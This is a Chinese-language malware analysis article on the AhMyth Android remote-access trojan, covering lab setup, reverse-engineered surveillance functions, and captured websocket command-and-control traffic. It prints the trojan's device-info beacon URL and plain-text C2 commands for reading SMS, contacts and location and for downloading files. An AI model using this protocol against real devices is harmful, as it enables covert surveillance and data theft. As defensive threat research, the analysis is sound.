深度剖析AhMyth安卓远控工作原理

文章首发地址:
https://xz.aliyun.com/t/14749
文章首发作者:
T0daySeeker

概述

最近,笔者大概回顾了一下,发现写技术文章也有一段时间了,前前后后也是写了近30篇文章,文章内容也是涉及了Windows平台木马、Linux平台木马的通信模型剖析、通信数据解密、攻击场景复现等。

虽然写了不少文章,但笔者心里始终感觉文章的面少了Android端木马的剖析,其实之前也尝试过想将Android端木马也像Windows、Linux平台一样研究,但却始终没有找到比较好的案例样本。

所以,笔者决定最近还是要想办法弥补这方面技术文章的空缺,因此,笔者尝试把自己电脑的收藏夹详详细细的翻了翻,终于找到了一款很早之前收藏的一个github开源项目–AhMyth-Android-RAT远控。

基于网络调研简单查找了一下关于此开源远控的利用情况,发现在APT攻击利用场景中,确实有不少APT组织会使用此开源远控。例如:在奇安信病毒响应中心于2024-01-30发布的《透明部落针对印度军方新近攻击活动分析》报告中,描述了透明部落组织会将AhMyth RAT远控作为移动端的攻击武器,相关截图如下:

深度剖析AhMyth安卓远控工作原理

为了能够深入的对AhMyth-Android-RAT远控工具进行详细剖析,笔者准备从如下几个角度开展研究分析:

  • 开源AhMyth-Android-RAT利用分析:模拟构建AhMyth-Android-RAT远控工具的攻击利用场景,在Windows主机中部署AhMyth-Android-RAT远控工具,在安卓模拟器中安装运行由AhMyth-Android-RAT远控工具生成的安卓端木马,实现木马上线及远程控制行为;
  • 远控木马功能剖析:借助Android端逆向分析工具JEB对此后门木马的功能进行剖析;
  • 通信模型剖析:基于AhMyth-Android-RAT远控工具运行时捕获的通信数据包,梳理剖析AhMyth-Android-RAT远控工具的通信模型;

开源AhMyth-Android-RAT利用分析

由于AhMyth-Android-RAT是开源安卓远控工具,因此可直接访问github即可对其工具源码、release版本程序进行下载研究。

通过对开源项目进行简单分析,发现:

  • AhMyth-Android-RAT远控工具于2017年7月8日首次发布,2021年9月4日停止维护;

  • AhMyth-Android-RAT开源项目由多个维护人员进行项目维护,4300余个标星,1700个账号forks拷贝项目;

  • 目前AhMyth-Android-RAT远控工具只有一个Release版本,版本号为:v1.0-beta.1,支持Windows、Linux多平台部署;

    相关截图如下:

深度剖析AhMyth安卓远控工作原理

深度剖析AhMyth安卓远控工作原理

生成安卓端木马

为了能够正常部署并使用AhMyth-Android-RAT远控工具,在开始使用AhMyth-Android-RAT远控工具前,需要在主机上配置JAVA环境,以便AhMyth-Android-RAT远控工具生成apk后门。

「备注:由于AhMyth-Android-RAT远控工具的推出时间较早,因此笔者也是选择了一个历史版本JDK程序(jdk-8u121-windows-i586.exe)用于配置JAVA环境。」

成功配置JAVA环境后,即可下载并安装AhMyth-Android-RAT远控工具,相关截图如下:

深度剖析AhMyth安卓远控工作原理

在GUI界面中选择【APK Builder】菜单即可对安卓端木马进行自定义配置,相关截图如下:

深度剖析AhMyth安卓远控工作原理

「备注:AhMyth-Android-RAT远控工具还支持将此后门木马捆绑至第三方apk文件中。」

木马上线

将安卓端木马安装于安卓模拟器中,然后点击运行,即可实现安卓端木马的运行上线,运行后,安卓端木马将在后台隐藏运行,相关截图如下:

深度剖析AhMyth安卓远控工作原理

在AhMyth-Android-RAT远控工具的GUI界面中选择【Victims】菜单,并开启对应端口的监听功能,即可接收安卓端木马的上线请求,相关截图如下:

深度剖析AhMyth安卓远控工作原理

远控行为

在AhMyth-Android-RAT远控工具的GUI界面中选择指定受控终端设备,即可实现对终端设备的远控行为,相关截图如下:

深度剖析AhMyth安卓远控工作原理

远控木马功能剖析

为了能够更深入的对AhMyth-Android-RAT远控工具生成的安卓端木马进行功能剖析,笔者准备使用JEB工具对安卓端木马程序进行逆向分析。

Manifest

通过分析,梳理安卓端后门程序的Manifest文件的核心内容:

  • 此安卓端后门程序的入口Activity为:ahmyth.mine.king.ahmyth.MainActivity
  • 此安卓端后门程序申请了大量的敏感权限,例如:android.permission.READ_SMS、android.permission.SEND_SMS、android.permission.READ_CONTACTS等权限

相关文件内容截图如下:

深度剖析AhMyth安卓远控工作原理

外链地址

通过分析,发现在此安卓端后门的ahmyth.mine.king.ahmyth.IOSocket代码中存放了外链地址信息,同时其URL中将存放当前终端设备的部分基本信息,外链地址信息如下:

http://192.168.153.131:8080?model=" + Build.MODEL + "&manf=" + Build.MANUFACTURER + "&release=" + Build.VERSION.RELEASE + "&id=" + android_id

相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

websocket通信

通过分析,发现此安卓端后门运行后,将使用websocket发起外链通信行为,相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

远控指令

通过分析,发现此安卓端后门运行后,将基于websocket通信接收远控指令,相关远控指令如下:

order 远控指令功能
x0000ca Camera
x0000cl Calls Logs
x0000cn contacts
x0000fm File Manager
x0000lm Location
x0000mc Mic
x0000sm SMS

相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

Camera远控功能

通过分析,发现ahmyth.mine.king.ahmyth.CameraManager代码即为对应Camera远控功能的恶意代码,相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

Calls Logs远控功能

通过分析,发现ahmyth.mine.king.ahmyth.CallsManager代码即为对应Calls Logs远控功能的恶意代码,相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

contacts远控功能

通过分析,发现ahmyth.mine.king.ahmyth.ContactsManager代码即为对应contacts远控功能的恶意代码,相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

File Manager远控功能

通过分析,发现ahmyth.mine.king.ahmyth.FileManager代码即为对应File Manager远控功能的恶意代码,相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

Location远控功能

通过分析,发现ahmyth.mine.king.ahmyth.LocManager代码即为对应Location远控功能的恶意代码,相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

Mic远控功能

通过分析,发现ahmyth.mine.king.ahmyth.MicManager代码即为对应Mic远控功能的恶意代码,相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

SMS远控功能

通过分析,发现ahmyth.mine.king.ahmyth.SMSManager代码即为对应SMS远控功能的恶意代码,相关代码截图如下:

深度剖析AhMyth安卓远控工作原理

通信模型剖析

对AhMyth-Android-RAT远控工具生成的安卓端木马上线过程及远程控制过程进行流量抓取分析,发现此安卓端后门的通信行为确实是websocket通信。

websocket通信

通过分析,梳理websocket通信过程如下:

  • websocket连接建立
  • websocket通信协议传输数据

websocket连接建立过程截图如下:

深度剖析AhMyth安卓远控工作原理

成功建立websocket通信后,后续通信信息则将以websocket通信协议进行传输,相关截图如下:

深度剖析AhMyth安卓远控工作原理

websocket通信载荷截图如下:(「直接使用wireshark跟踪websocket流即可查看websocket通信载荷」

深度剖析AhMyth安卓远控工作原理

通信模型剖析

通过分析,发现AhMyth-Android-RAT远控工具的通信数据是直接以websocket通信协议封装的,并未使用任何通信加密算法。因此,我们可直接基于通信数据包对其通信数据模型进行剖析。

实际通信案例如下:

  • Camera远控指令
#Camera远控指令
42["order",{"order":"x0000ca","extra":"camList"}]
#Camera远控指令响应数据
42["x0000ca",{"camList":true,"list":[{"name":"Back","id":0},{"name":"Front","id":1}]}]

42["order",{"order":"x0000ca","extra":1}]
  • File Manager远控指令
#File Manager远控指令
42["order",{"order":"x0000fm","extra":"ls","path":"/"}]
#File Manager远控指令响应数据
42["x0000fm",[{
 "name""../",
 "isDir"true
},{
 "name""vendor_dlkm",
 "isDir"true,
 "path""/vendor_dlkm"
},{
 "name""vendor",
 "isDir"true,
 "path""/vendor"
},{
 "name""system_ext",
 "isDir"true,
 "path""/system_ext"
},{
 "name""system",
 "isDir"true,
 "path""/system"
},{
 "name""sys",
 "isDir"true,
 "path""/sys"
},{
 "name""storage",
 "isDir"true,
 "path""/storage"
},{"name":"sepolicy","isDir":false,"path":"/sepolicy"},{"name":"second_stage_resources","isDir":true,"path":"/second_stage_resources"},{"name":"sdcard","isDir":true,"path":"/sdcard"},{"name":"product","isDir":true,"path":"/product"},{"name":"proc","isDir":true,"path":"/proc"},{"name":"postinstall","isDir":true,"path":"/postinstall"},{"name":"pcgame","isDir":true,"path":"/pcgame"},{"name":"oem","isDir":true,"path":"/oem"},{"name":"odm_dlkm","isDir":true,"path":"/odm_dlkm"},{"name":"odm","isDir":true,"path":"/odm"},{"name":"mnt","isDir":true,"path":"/mnt"},{"name":"linkerconfig","isDir":true,"path":"/linkerconfig"},{"name":"lib","isDir":true,"path":"/lib"},{"name":"init.environ.rc","isDir":false,"path":"/init.environ.rc"},{"name":"init","isDir":false,"path":"/init"},{"name":"etc","isDir":true,"path":"/etc"},{"name":"dev","isDir":true,"path":"/dev"},{"name":"debug_ramdisk","isDir":true,"path":"/debug_ramdisk"},{"name":"data_mirror","isDir":true,"path":"/data_mirror"},{"name":"data","isDir":true,"path":"/data"},{"name":"d","isDir":true,"path":"/d"},{"name":"config","isDir":true,"path":"/config"},{"name":"cache","isDir":true,"path":"/cache"},{"name":"bugreports","isDir":false,"path":"/bugreports"},{"name":"bin","isDir":true,"path":"/bin"},{"name":"apex","isDir":true,"path":"/apex"},{"name":"acct","isDir":true,"path":"/acct"}]]
  • Location远控指令
#Location远控指令
42["order",{"order":"x0000lm"}]
#Location远控指令响应数据
42["x0000lm",{"enable":true,"lat":XXXXXXX,"lng":XXXXXXX}]
  • contacts远控指令
#contacts远控指令
42["order",{"order":"x0000cn"}]
#contacts远控指令响应数据
42["x0000cn",{"contactsList":[]}]
  • SMS远控指令
#SMS远控指令
42["order",{"order":"x0000sm","extra":"ls"}]
#SMS远控指令响应数据
42["x0000sm",{"smsList":[]}]
  • Calls Logs远控指令
#Calls Logs远控指令
42["order",{"order":"x0000cl"}]
#Calls Logs远控指令响应数据
42["x0000cl",{"callsList":[]}]
  • File Manager远控指令-下载文件
#File Manager远控指令
42["order",{"order":"x0000fm","extra":"ls","path":"/"}]
#File Manager远控指令响应数据
42["x0000fm",[{"name":"../","isDir":true},{"name":"vendor_dlkm","isDir":true,"path":"/vendor_dlkm"},{"name":"vendor","isDir":true,"path":"/vendor"},{"name":"system_ext","isDir":true,"path":"/system_ext"},{"name":"system","isDir":true,"path":"/system"},{"name":"sys","isDir":true,"path":"/sys"},{"name":"storage","isDir":true,"path":"/storage"},{"name":"sepolicy","isDir":false,"path":"/sepolicy"},{"name":"second_stage_resources","isDir":true,"path":"/second_stage_resources"},{"name":"sdcard","isDir":true,"path":"/sdcard"},{"name":"product","isDir":true,"path":"/product"},{"name":"proc","isDir":true,"path":"/proc"},{"name":"postinstall","isDir":true,"path":"/postinstall"},{"name":"pcgame","isDir":true,"path":"/pcgame"},{"name":"oem","isDir":true,"path":"/oem"},{"name":"odm_dlkm","isDir":true,"path":"/odm_dlkm"},{"name":"odm","isDir":true,"path":"/odm"},{"name":"mnt","isDir":true,"path":"/mnt"},{"name":"linkerconfig","isDir":true,"path":"/linkerconfig"},{"name":"lib","isDir":true,"path":"/lib"},{"name":"init.environ.rc","isDir":false,"path":"/init.environ.rc"},{"name":"init","isDir":false,"path":"/init"},{"name":"etc","isDir":true,"path":"/etc"},{"name":"dev","isDir":true,"path":"/dev"},{"name":"debug_ramdisk","isDir":true,"path":"/debug_ramdisk"},{"name":"data_mirror","isDir":true,"path":"/data_mirror"},{"name":"data","isDir":true,"path":"/data"},{"name":"d","isDir":true,"path":"/d"},{"name":"config","isDir":true,"path":"/config"},{"name":"cache","isDir":true,"path":"/cache"},{"name":"bugreports","isDir":false,"path":"/bugreports"},{"name":"bin","isDir":true,"path":"/bin"},{"name":"apex","isDir":true,"path":"/apex"},{"name":"acct","isDir":true,"path":"/acct"}]]
#File Manager远控指令-选择目录
42["order",{"order":"x0000fm","extra":"ls","path":"//sdcard"}]
#File Manager远控指令-返回目录信息
42["x0000fm",[{"name":"../","isDir":true,"path":"/"},{"name":"DCIM","isDir":true,"path":"/sdcard/DCIM"},{"name":"Music","isDir":true,"path":"/sdcard/Music"},{"name":"Pictures","isDir":true,"path":"/sdcard/Pictures"},{"name":"Ringtones","isDir":true,"path":"/sdcard/Ringtones"},{"name":"Download","isDir":true,"path":"/sdcard/Download"},{"name":"$MuMu12Shared","isDir":true,"path":"/sdcard/$MuMu12Shared"},{"name":"Audiobooks","isDir":true,"path":"/sdcard/Audiobooks"},{"name":"Podcasts","isDir":true,"path":"/sdcard/Podcasts"},{"name":"Movies","isDir":true,"path":"/sdcard/Movies"},{"name":"Notifications","isDir":true,"path":"/sdcard/Notifications"},{"name":"Documents","isDir":true,"path":"/sdcard/Documents"},{"name":"Android","isDir":true,"path":"/sdcard/Android"},{"name":"Alarms","isDir":true,"path":"/sdcard/Alarms"},{"name":"Recordings","isDir":true,"path":"/sdcard/Recordings"},{"name":"Music_old","isDir":true,"path":"/sdcard/Music_old"},{"name":"Screenshots","isDir":true,"path":"/sdcard/Screenshots"}]]
#File Manager远控指令-选择目录
42["order",{"order":"x0000fm","extra":"ls","path":"//sdcard/Download"}]
#File Manager远控指令-返回目录信息
42["x0000fm",[{"name":"../","isDir":true,"path":"/sdcard"},{"name":"2075.jpg","isDir":false,"path":"/sdcard/Download/2075.jpg"}]]
#File Manager远控指令-下载指定文件
42["order",{"order":"x0000fm","extra":"dl","path":"//sdcard/Download/2075.jpg"}]
#File Manager远控指令-返回指定文件内容
451-["x0000fm",{"file":true,"name":"2075.jpg","buffer":{"_placeholder":true,"num":0}}].......JFIF.........省略文件载荷内容......


原文始发于微信公众号(T0daySeeker):深度剖析AhMyth安卓远控工作原理

版权声明:admin 发表于 2024年6月5日 上午8:01。
转载请注明:深度剖析AhMyth安卓远控工作原理 | CTF导航

相关文章